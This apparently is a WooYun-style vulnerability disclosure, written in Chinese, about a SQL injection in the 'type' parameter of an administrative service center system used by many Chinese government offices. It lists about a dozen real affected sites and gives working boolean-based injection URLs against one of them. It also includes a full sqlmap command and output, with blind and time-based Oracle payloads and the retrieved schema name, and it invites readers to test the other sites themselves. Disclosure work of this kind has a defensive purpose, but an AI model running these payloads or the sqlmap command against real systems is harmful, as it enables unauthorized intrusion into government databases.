某Gov行政中心系统Oracle注入漏洞(使用量大)

### 简要描述： 其涉及全国各省行政服务中心，案例不比大汉jcms少 ### 详细说明： 看这里。。。 接上一弹 [WooYun: 某大型政府服务系统Oracle注入(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-085183) 所有涉及单位为政府政务中心（其涉及全国各省行政服务中心，案例不比大汉jcms少）： 如： http://www.sinanxzfw.gov.cn/ 思南县行政服务中心 http://www.yjxzfw.com.cn/ 印江县行政服务中心 http://www.gygxzw.gov.cn:8066/ 贵阳国家高新区行政服务中心 http://www.tlsp.net/ 铁岭市公共行政服务中心 http://58.42.249.116/ 云岩区政务服务中心 http://218.201.232.67:8080/ 铜仁市行政服务中心 http://hxasc.cn/ 花溪区行政服务中心 http://jc.dlxg.gov.cn/ 大连西岗区电子监察网 http://jjjc.sqxz.gov.cn/ 铜仁市行政服务中心 http://119.1.108.246/ 望谟县行政服务中心 http://58.42.241.14:6778/ 贵阳经济开发区政务服务中心 http://119.1.108.246/ ....//只统计一部分，其他案例请自行统计。 [<img src="https://images.seebug.org/upload/201412/1012490016ffea883990a3b310e50f8529d4e987.jpg" alt="HY6YVAJJZEQERW7]JA]LW@C.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/1012490016ffea883990a3b310e50f8529d4e987.jpg) [<img src="https://images.seebug.org/upload/201412/1012495981219d20ee77eb974d60b86390a0f430.jpg" alt="QT~C[(ZJCBA_~G~7(PJB22M.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/1012495981219d20ee77eb974d60b86390a0f430.jpg) 注入参数为：type http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 注入例子： http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=12 （正常显示） http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=123 （非正常显示） sqlmap注入如下： [<img src="https://images.seebug.org/upload/201412/10130216144a10125dcae6d452a96df9d0501c73.jpg" alt="16RKGHGYALH(}WXH8IW_D}N.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10130216144a10125dcae6d452a96df9d0501c73.jpg) ``` D:\sqlmap>python sqlmap.py -u "http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu 1=中心动态&menu2=中心新闻&type=2" -p type --current-db sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 13:20:01 [13:20:01] [INFO] resuming back-end DBMS 'oracle' [13:20:01] [INFO] testing connection to the target url [13:20:02] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: type Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: menu1=????&menu2=????&type=2 AND 7241=7241 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: menu1=????&menu2=????&type=2 AND 3913=DBMS_PIPE.RECEIVE_MESSAGE(CHR (72)||CHR(108)||CHR(67)||CHR(76),5) --- [13:20:02] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 web application technology: Servlet 2.5, JSP, JSP 2.1 back-end DBMS: Oracle [13:20:02] [INFO] fetching current database [13:20:02] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [13:20:02] [INFO] retrieved: [13:20:02] [WARNING] reflective value(s) found and filtering out SNWZ_WEB current schema (equivalent to database on Oracle): 'SNWZ_WEB' [13:20:29] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www. sinanxzfw.gov.cn' [*] shutting down at 13:20:29 ``` 库名：SNWZ_WEB 其他的就自测吧！ 涉事政府单位还是蛮多的，请cncert自查。。。都是重要政务系统.... ### 漏洞证明： http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=12 （正常显示） http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu1=中心动态&menu2=中心新闻&type=2 AND 3*2*2=123 （非正常显示） sqlmap注入如下： [<img src="https://images.seebug.org/upload/201412/10130216144a10125dcae6d452a96df9d0501c73.jpg" alt="16RKGHGYALH(}WXH8IW_D}N.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/10130216144a10125dcae6d452a96df9d0501c73.jpg) ``` D:\sqlmap>python sqlmap.py -u "http://www.sinanxzfw.gov.cn/morebrowsnews.do?menu 1=中心动态&menu2=中心新闻&type=2" -p type --current-db sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 13:20:01 [13:20:01] [INFO] resuming back-end DBMS 'oracle' [13:20:01] [INFO] testing connection to the target url [13:20:02] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: type Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: menu1=????&menu2=????&type=2 AND 7241=7241 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: menu1=????&menu2=????&type=2 AND 3913=DBMS_PIPE.RECEIVE_MESSAGE(CHR (72)||CHR(108)||CHR(67)||CHR(76),5) --- [13:20:02] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 web application technology: Servlet 2.5, JSP, JSP 2.1 back-end DBMS: Oracle [13:20:02] [INFO] fetching current database [13:20:02] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [13:20:02] [INFO] retrieved: [13:20:02] [WARNING] reflective value(s) found and filtering out SNWZ_WEB current schema (equivalent to database on Oracle): 'SNWZ_WEB' [13:20:29] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www. sinanxzfw.gov.cn' [*] shutting down at 13:20:29 ``` 库名：SNWZ_WEB 其他的就自测吧！